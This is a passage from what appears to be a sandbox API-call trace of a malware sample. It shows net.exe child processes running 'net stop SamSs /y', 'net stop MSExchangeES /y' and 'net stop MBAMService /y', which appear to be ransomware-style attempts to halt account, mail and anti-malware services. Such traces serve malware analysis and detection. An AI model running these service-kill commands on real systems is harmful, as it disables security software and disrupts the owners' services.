returned -7 [0209.058] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0209.058] _wcsicmp (_String1="session", _String2="stop") returned -15 [0209.058] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0209.058] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0209.058] _wcsicmp (_String1="share", _String2="stop") returned -12 [0209.058] _wcsicmp (_String1="start", _String2="stop") returned -14 [0209.058] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0209.058] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0209.058] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0209.058] _wcsicmp (_String1="accounts", _String2="SamSs") returned -18 [0209.058] _wcsicmp (_String1="computer", _String2="SamSs") returned -16 [0209.058] _wcsicmp (_String1="config", _String2="SamSs") returned -16 [0209.058] _wcsicmp (_String1="continue", _String2="SamSs") returned -16 [0209.058] _wcsicmp (_String1="cont", _String2="SamSs") returned -16 [0209.058] _wcsicmp (_String1="file", _String2="SamSs") returned -13 [0209.058] _wcsicmp (_String1="files", _String2="SamSs") returned -13 [0209.058] _wcsicmp (_String1="group", _String2="SamSs") returned -12 [0209.058] _wcsicmp (_String1="groups", _String2="SamSs") returned -12 [0209.058] _wcsicmp (_String1="help", _String2="SamSs") returned -11 [0209.058] _wcsicmp (_String1="helpmsg", _String2="SamSs") returned -11 [0209.058] _wcsicmp (_String1="localgroup", _String2="SamSs") returned -7 [0209.058] _wcsicmp (_String1="pause", _String2="SamSs") returned -3 [0209.058] _wcsicmp (_String1="session", _String2="SamSs") returned 4 [0209.058] _wcsicmp (_String1="sessions", _String2="SamSs") returned 4 [0209.058] _wcsicmp (_String1="sess", _String2="SamSs") returned 4 [0209.058] _wcsicmp (_String1="share", _String2="SamSs") returned 7 [0209.058] _wcsicmp (_String1="start", _String2="SamSs") returned 19 [0209.059] _wcsicmp (_String1="stats", _String2="SamSs") returned 19 [0209.059] _wcsicmp (_String1="statistics", _String2="SamSs") returned 19 [0209.059] _wcsicmp (_String1="stop", _String2="SamSs") returned 19 [0209.059] _wcsicmp (_String1="time", _String2="SamSs") returned 1 [0209.059] _wcsicmp (_String1="user", _String2="SamSs") returned 2 [0209.059] _wcsicmp (_String1="users", _String2="SamSs") returned 2 [0209.059] _wcsicmp (_String1="msg", _String2="SamSs") returned -6 [0209.059] _wcsicmp (_String1="messenger", _String2="SamSs") returned -6 [0209.059] _wcsicmp (_String1="receiver", _String2="SamSs") returned -1 [0209.059] _wcsicmp (_String1="rcv", _String2="SamSs") returned -1 [0209.059] _wcsicmp (_String1="netpopup", _String2="SamSs") returned -5 [0209.059] _wcsicmp (_String1="redirector", _String2="SamSs") returned -1 [0209.059] _wcsicmp (_String1="redir", _String2="SamSs") returned -1 [0209.059] _wcsicmp (_String1="rdr", _String2="SamSs") returned -1 [0209.059] _wcsicmp (_String1="workstation", _String2="SamSs") returned 4 [0209.059] _wcsicmp (_String1="work", _String2="SamSs") returned 4 [0209.059] _wcsicmp (_String1="wksta", _String2="SamSs") returned 4 [0209.059] _wcsicmp (_String1="prdr", _String2="SamSs") returned -3 [0209.059] _wcsicmp (_String1="devrdr", _String2="SamSs") returned -15 [0209.059] _wcsicmp (_String1="lanmanworkstation", _String2="SamSs") returned -7 [0209.059] _wcsicmp (_String1="server", _String2="SamSs") returned 4 [0209.059] _wcsicmp (_String1="svr", _String2="SamSs") returned 21 [0209.059] _wcsicmp (_String1="srv", _String2="SamSs") returned 17 [0209.059] _wcsicmp (_String1="lanmanserver", _String2="SamSs") returned -7 [0209.059] _wcsicmp (_String1="alerter", _String2="SamSs") returned -18 [0209.059] _wcsicmp (_String1="netlogon", _String2="SamSs") returned -5 [0209.059] _wcsupr (in: _String="SamSs" | out: _String="SAMSS") returned="SAMSS" [0209.059] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3d54a0 [0209.062] GetServiceKeyNameW (in: hSCManager=0x3d54a0, lpDisplayName="SAMSS", lpServiceName=0x9baaf0, lpcchBuffer=0x2dfd40 | out: lpServiceName="", lpcchBuffer=0x2dfd40) returned 0 [0209.062] _wcsicmp (_String1="msg", _String2="SAMSS") returned -6 [0209.062] _wcsicmp (_String1="messenger", _String2="SAMSS") returned -6 [0209.062] _wcsicmp (_String1="receiver", _String2="SAMSS") returned -1 [0209.062] _wcsicmp (_String1="rcv", _String2="SAMSS") returned -1 [0209.063] _wcsicmp (_String1="redirector", _String2="SAMSS") returned -1 [0209.063] _wcsicmp (_String1="redir", _String2="SAMSS") returned -1 [0209.063] _wcsicmp (_String1="rdr", _String2="SAMSS") returned -1 [0209.063] _wcsicmp (_String1="workstation", _String2="SAMSS") returned 4 [0209.063] _wcsicmp (_String1="work", _String2="SAMSS") returned 4 [0209.063] _wcsicmp (_String1="wksta", _String2="SAMSS") returned 4 [0209.063] _wcsicmp (_String1="prdr", _String2="SAMSS") returned -3 [0209.063] _wcsicmp (_String1="devrdr", _String2="SAMSS") returned -15 [0209.063] _wcsicmp (_String1="lanmanworkstation", _String2="SAMSS") returned -7 [0209.063] _wcsicmp (_String1="server", _String2="SAMSS") returned 4 [0209.063] _wcsicmp (_String1="svr", _String2="SAMSS") returned 21 [0209.063] _wcsicmp (_String1="srv", _String2="SAMSS") returned 17 [0209.063] _wcsicmp (_String1="lanmanserver", _String2="SAMSS") returned -7 [0209.063] _wcsicmp (_String1="alerter", _String2="SAMSS") returned -18 [0209.063] _wcsicmp (_String1="netlogon", _String2="SAMSS") returned -5 [0209.063] NetServiceControl (in: servername=0x0, service="SAMSS", opcode=0x0, arg=0x0, bufptr=0x2dfd3c | out: bufptr=0x2dfd3c) returned 0x0 [0209.067] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x2dfd18 | out: Buffer=0x2dfd18*=0x3d7850) returned 0x0 [0209.067] OpenServiceW (hSCManager=0x3d54a0, lpServiceName="SAMSS", dwDesiredAccess=0xc) returned 0x3d55b8 [0209.067] QueryServiceStatus (in: hService=0x3d55b8, lpServiceStatus=0x2dfcec | out: lpServiceStatus=0x2dfcec*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0209.067] NetApiBufferFree (Buffer=0x3d7850) returned 0x0 [0209.068] CloseServiceHandle (hSCObject=0x3d55b8) returned 1 [0209.068] wcscpy_s (in: _Destination=0x9ba4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0209.068] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0209.069] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x88f, dwLanguageId=0x0, lpBuffer=0x9bb338, nSize=0x800, Arguments=0x9b9dd8 | out: lpBuffer="The requested pause, continue, or stop is not valid for this service.\r\n") returned 0x47 [0209.070] GetFileType (hFile=0x26c) returned 0x3 [0209.070] LocalAlloc (uFlags=0x0, uBytes=0x8e) returned 0x3d6258 [0209.070] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The requested pause, continue, or stop is not valid for this service.\r\n", cchWideChar=71, lpMultiByteStr=0x3d6258, cbMultiByte=142, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The requested pause, continue, or stop is not valid for this service.\r\n", lpUsedDefaultChar=0x0) returned 71 [0209.070] WriteFile (in: hFile=0x26c, lpBuffer=0x3d6258, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x2dfc34, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfc34, lpOverlapped=0x0) returned 0 [0209.070] LocalFree (hMem=0x3d6258) returned 0x0 [0209.070] GetFileType (hFile=0x26c) returned 0x3 [0209.070] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d6258 [0209.070] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3d6258, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=", lpUsedDefaultChar=0x0) returned 2 [0209.070] WriteFile (in: hFile=0x26c, lpBuffer=0x3d6258, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2dfc34, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfc34, lpOverlapped=0x0) returned 0 [0209.070] LocalFree (hMem=0x3d6258) returned 0x0 [0209.070] _ultow (in: _Dest=0x88f, _Radix=3013732 | out: _Dest=0x88f) returned="2191" [0209.070] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x9bb338, nSize=0x800, Arguments=0x9b9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2191.\r\n") returned 0x34 [0209.070] GetFileType (hFile=0x26c) returned 0x3 [0209.070] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3d6258 [0209.070] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2191.\r\n", cchWideChar=52, lpMultiByteStr=0x3d6258, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2191.\r\nfor this service.\r\n", lpUsedDefaultChar=0x0) returned 52 [0209.070] WriteFile (in: hFile=0x26c, lpBuffer=0x3d6258, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2dfc40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfc40, lpOverlapped=0x0) returned 0 [0209.070] LocalFree (hMem=0x3d6258) returned 0x0 [0209.070] GetFileType (hFile=0x26c) returned 0x3 [0209.070] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d6258 [0209.070] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3d6258, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=", lpUsedDefaultChar=0x0) returned 2 [0209.070] WriteFile (in: hFile=0x26c, lpBuffer=0x3d6258, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2dfc40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfc40, lpOverlapped=0x0) returned 0 [0209.071] LocalFree (hMem=0x3d6258) returned 0x0 [0209.071] NetApiBufferFree (Buffer=0x3d1c50) returned 0x0 [0209.071] NetApiBufferFree (Buffer=0x3d1c68) returned 0x0 [0209.071] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SamSs /y" [0209.071] exit (_Code=2) Process: id = "268" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6c062000" os_pid = "0xa94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSExchangeES /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 441 os_tid = 0xa40 Process: id = "269" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1f123000" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "268" os_parent_pid = "0xa94" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeES /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 442 os_tid = 0xa3c [0209.207] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bfde8 | out: lpSystemTimeAsFileTime=0x1bfde8*(dwLowDateTime=0x45e2f0e0, dwHighDateTime=0x1d57a87)) [0209.207] GetCurrentProcessId () returned 0xa44 [0209.207] GetCurrentThreadId () returned 0xa3c [0209.207] GetTickCount () returned 0x116de4e [0209.207] QueryPerformanceCounter (in: lpPerformanceCount=0x1bfde0 | out: lpPerformanceCount=0x1bfde0*=32949205826) returned 1 [0209.208] GetModuleHandleA (lpModuleName=0x0) returned 0x850000 [0209.208] __set_app_type (_Type=0x1) [0209.208] __p__fmode () returned 0x74eb31f4 [0209.208] __p__commode () returned 0x74eb31fc [0209.208] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x85ffe6) returned 0x0 [0209.208] __getmainargs (in: _Argc=0x869064, _Argv=0x86906c, _Env=0x869068, _DoWildCard=0, _StartInfo=0x869024 | out: _Argc=0x869064, _Argv=0x86906c, _Env=0x869068) returned 0 [0209.208] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.208] GetConsoleOutputCP () returned 0x1b5 [0209.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x869080 | out: lpCPInfo=0x869080) returned 1 [0209.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.212] sprintf_s (in: _DstBuf=0x1bfda0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0209.212] setlocale (category=0, locale=".437") returned="English_United States.437" [0209.214] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0209.214] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0209.214] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeES /y" [0209.214] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1bfb6c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0209.214] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x6c) returned 0x383c10 [0209.214] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0209.215] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfd70 | out: Buffer=0x1bfd70*=0x381c70) returned 0x0 [0209.215] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfd70 | out: Buffer=0x1bfd70*=0x381c88) returned 0x0 [0209.215] _fileno (_File=0x74eb2900) returned -2 [0209.215] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0209.215] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0209.215] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0209.215] _wcsicmp (_String1="config", _String2="stop") returned -16 [0209.215] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0209.215] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0209.215] _wcsicmp (_String1="file", _String2="stop") returned -13 [0209.215] _wcsicmp (_String1="files", _String2="stop") returned -13 [0209.215] _wcsicmp (_String1="group", _String2="stop") returned -12 [0209.215] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0209.215] _wcsicmp (_String1="help", _String2="stop") returned -11 [0209.215] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0209.215] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0209.215] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0209.215] _wcsicmp (_String1="session", _String2="stop") returned -15 [0209.215] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0209.215] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0209.215] _wcsicmp (_String1="share", _String2="stop") returned -12 [0209.215] _wcsicmp (_String1="start", _String2="stop") returned -14 [0209.215] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0209.215] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0209.215] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0209.215] _wcsicmp (_String1="accounts", _String2="MSExchangeES") returned -12 [0209.215] _wcsicmp (_String1="computer", _String2="MSExchangeES") returned -10 [0209.215] _wcsicmp (_String1="config", _String2="MSExchangeES") returned -10 [0209.215] _wcsicmp (_String1="continue", _String2="MSExchangeES") returned -10 [0209.215] _wcsicmp (_String1="cont", _String2="MSExchangeES") returned -10 [0209.215] _wcsicmp (_String1="file", _String2="MSExchangeES") returned -7 [0209.215] _wcsicmp (_String1="files", _String2="MSExchangeES") returned -7 [0209.216] _wcsicmp (_String1="group", _String2="MSExchangeES") returned -6 [0209.216] _wcsicmp (_String1="groups", _String2="MSExchangeES") returned -6 [0209.216] _wcsicmp (_String1="help", _String2="MSExchangeES") returned -5 [0209.216] _wcsicmp (_String1="helpmsg", _String2="MSExchangeES") returned -5 [0209.216] _wcsicmp (_String1="localgroup", _String2="MSExchangeES") returned -1 [0209.216] _wcsicmp (_String1="pause", _String2="MSExchangeES") returned 3 [0209.216] _wcsicmp (_String1="session", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="sessions", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="sess", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="share", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="start", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="stats", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="statistics", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="stop", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="time", _String2="MSExchangeES") returned 7 [0209.216] _wcsicmp (_String1="user", _String2="MSExchangeES") returned 8 [0209.216] _wcsicmp (_String1="users", _String2="MSExchangeES") returned 8 [0209.216] _wcsicmp (_String1="msg", _String2="MSExchangeES") returned 2 [0209.216] _wcsicmp (_String1="messenger", _String2="MSExchangeES") returned -14 [0209.216] _wcsicmp (_String1="receiver", _String2="MSExchangeES") returned 5 [0209.216] _wcsicmp (_String1="rcv", _String2="MSExchangeES") returned 5 [0209.216] _wcsicmp (_String1="netpopup", _String2="MSExchangeES") returned 1 [0209.216] _wcsicmp (_String1="redirector", _String2="MSExchangeES") returned 5 [0209.216] _wcsicmp (_String1="redir", _String2="MSExchangeES") returned 5 [0209.216] _wcsicmp (_String1="rdr", _String2="MSExchangeES") returned 5 [0209.216] _wcsicmp (_String1="workstation", _String2="MSExchangeES") returned 10 [0209.216] _wcsicmp (_String1="work", _String2="MSExchangeES") returned 10 [0209.216] _wcsicmp (_String1="wksta", _String2="MSExchangeES") returned 10 [0209.216] _wcsicmp (_String1="prdr", _String2="MSExchangeES") returned 3 [0209.216] _wcsicmp (_String1="devrdr", _String2="MSExchangeES") returned -9 [0209.216] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeES") returned -1 [0209.216] _wcsicmp (_String1="server", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="svr", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="srv", _String2="MSExchangeES") returned 6 [0209.216] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeES") returned -1 [0209.216] _wcsicmp (_String1="alerter", _String2="MSExchangeES") returned -12 [0209.216] _wcsicmp (_String1="netlogon", _String2="MSExchangeES") returned 1 [0209.217] _wcsupr (in: _String="MSExchangeES" | out: _String="MSEXCHANGEES") returned="MSEXCHANGEES" [0209.217] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3854d0 [0209.219] GetServiceKeyNameW (in: hSCManager=0x3854d0, lpDisplayName="MSEXCHANGEES", lpServiceName=0x86aaf0, lpcchBuffer=0x1bfd0c | out: lpServiceName="", lpcchBuffer=0x1bfd0c) returned 0 [0209.220] _wcsicmp (_String1="msg", _String2="MSEXCHANGEES") returned 2 [0209.220] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEES") returned -14 [0209.220] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEES") returned 5 [0209.220] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEES") returned 5 [0209.220] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEES") returned 5 [0209.220] _wcsicmp (_String1="redir", _String2="MSEXCHANGEES") returned 5 [0209.220] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEES") returned 5 [0209.220] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEES") returned 10 [0209.220] _wcsicmp (_String1="work", _String2="MSEXCHANGEES") returned 10 [0209.220] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEES") returned 10 [0209.220] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEES") returned 3 [0209.220] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEES") returned -9 [0209.220] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEES") returned -1 [0209.220] _wcsicmp (_String1="server", _String2="MSEXCHANGEES") returned 6 [0209.220] _wcsicmp (_String1="svr", _String2="MSEXCHANGEES") returned 6 [0209.220] _wcsicmp (_String1="srv", _String2="MSEXCHANGEES") returned 6 [0209.220] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEES") returned -1 [0209.220] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEES") returned -12 [0209.220] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEES") returned 1 [0209.220] NetServiceControl (in: servername=0x0, service="MSEXCHANGEES", opcode=0x0, arg=0x0, bufptr=0x1bfd08 | out: bufptr=0x1bfd08) returned 0x889 [0209.221] wcscpy_s (in: _Destination=0x86a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0209.221] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0209.222] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x86b338, nSize=0x800, Arguments=0x869dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0209.223] GetFileType (hFile=0x26c) returned 0x3 [0209.223] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x384000 [0209.223] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x384000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0209.223] WriteFile (in: hFile=0x26c, lpBuffer=0x384000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1bfc48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfc48, lpOverlapped=0x0) returned 0 [0209.223] LocalFree (hMem=0x384000) returned 0x0 [0209.223] GetFileType (hFile=0x26c) returned 0x3 [0209.223] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3862a8 [0209.223] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3862a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n8", lpUsedDefaultChar=0x0) returned 2 [0209.223] WriteFile (in: hFile=0x26c, lpBuffer=0x3862a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfc48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfc48, lpOverlapped=0x0) returned 0 [0209.223] LocalFree (hMem=0x3862a8) returned 0x0 [0209.223] _ultow (in: _Dest=0x889, _Radix=1834104 | out: _Dest=0x889) returned="2185" [0209.223] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x86b338, nSize=0x800, Arguments=0x869dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0209.223] GetFileType (hFile=0x26c) returned 0x3 [0209.223] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3862a8 [0209.224] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3862a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0209.224] WriteFile (in: hFile=0x26c, lpBuffer=0x3862a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1bfc54, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfc54, lpOverlapped=0x0) returned 0 [0209.224] LocalFree (hMem=0x3862a8) returned 0x0 [0209.224] GetFileType (hFile=0x26c) returned 0x3 [0209.224] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3862a8 [0209.224] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3862a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n8", lpUsedDefaultChar=0x0) returned 2 [0209.224] WriteFile (in: hFile=0x26c, lpBuffer=0x3862a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfc54, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfc54, lpOverlapped=0x0) returned 0 [0209.224] LocalFree (hMem=0x3862a8) returned 0x0 [0209.224] NetApiBufferFree (Buffer=0x381c70) returned 0x0 [0209.224] NetApiBufferFree (Buffer=0x381c88) returned 0x0 [0209.224] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeES /y" [0209.225] exit (_Code=2) Process: id = "270" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4ce67000" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MBAMService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 443 os_tid = 0xaa0 Process: id = "271" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4cab9000" os_pid = "0xa4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "270" os_parent_pid = "0xa48" cmd_line = "C:\\Windows\\system32\\net1 stop MBAMService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 444 os_tid = 0xa9c [0209.385] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefc18 | out: lpSystemTimeAsFileTime=0xefc18*(dwLowDateTime=0x45fd2000, dwHighDateTime=0x1d57a87)) [0209.385] GetCurrentProcessId () returned 0xa4c [0209.385] GetCurrentThreadId () returned 0xa9c [0209.385] GetTickCount () returned 0x116defa [0209.385] QueryPerformanceCounter (in: lpPerformanceCount=0xefc10 | out: lpPerformanceCount=0xefc10*=32966945704) returned 1 [0209.385] GetModuleHandleA (lpModuleName=0x0) returned 0x770000 [0209.385] __set_app_type (_Type=0x1) [0209.385] __p__fmode () returned 0x74eb31f4 [0209.385] __p__commode () returned 0x74eb31fc [0209.385] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x77ffe6) returned 0x0 [0209.386] __getmainargs (in: _Argc=0x789064, _Argv=0x78906c, _Env=0x789068, _DoWildCard=0, _StartInfo=0x789024 | out: _Argc=0x789064, _Argv=0x78906c, _Env=0x789068) returned 0 [0209.386] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, 